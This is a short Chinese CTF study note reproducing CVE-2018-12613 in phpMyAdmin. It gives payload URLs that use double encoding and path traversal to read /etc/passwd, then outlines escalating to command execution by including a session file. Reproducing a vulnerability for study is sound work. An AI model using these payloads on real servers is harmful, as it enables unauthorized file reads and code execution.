「配枪朱丽叶。」

RootのCTF学习笔记。

PHPMYADMIN:CVE-2018-12613后台任意文件包含漏洞

漏洞复现 web

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

payload:

http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

https://s2.ax1x.com/2019/12/09/Q0EXrR.png
可见,可见/etc/passwd被读取,说明文件包含漏洞存在。

通过session达成命令执行:
【1】在sql中执行一个代码,比如:
https://s2.ax1x.com/2019/12/09/Q0Zu01.png

【2】点击执行的时候抓包哦,拿到phpmyadmin的session:
https://s2.ax1x.com/2019/12/09/Q0ZltK.png

【3】

index.php?target=db_sql.php%3f/../../../../../../tmp/sess_21441e4669faa2af8451bb0b9b2c6a2f

https://s2.ax1x.com/2019/12/09/Q00CH1.png